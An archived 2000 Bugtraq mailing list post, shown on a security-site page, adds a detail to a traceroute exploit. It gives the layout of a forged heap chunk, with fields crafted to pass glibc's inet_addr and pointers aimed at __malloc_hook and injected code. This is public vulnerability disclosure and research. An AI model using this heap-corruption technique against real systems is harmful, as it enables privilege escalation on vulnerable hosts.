Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Addendum: Traceroute exploit
From: pedward () WEBCOM COM
Date: Mon, 2 Oct 2000 22:25:45 -0700
I jsut saw Pavel's note and looked at glibc, inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry () webcom com             System Architecture               Think Blue.  /\

  By Date           By Thread  

Current thread:
  • Addendum: Traceroute exploit pedward (Oct 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]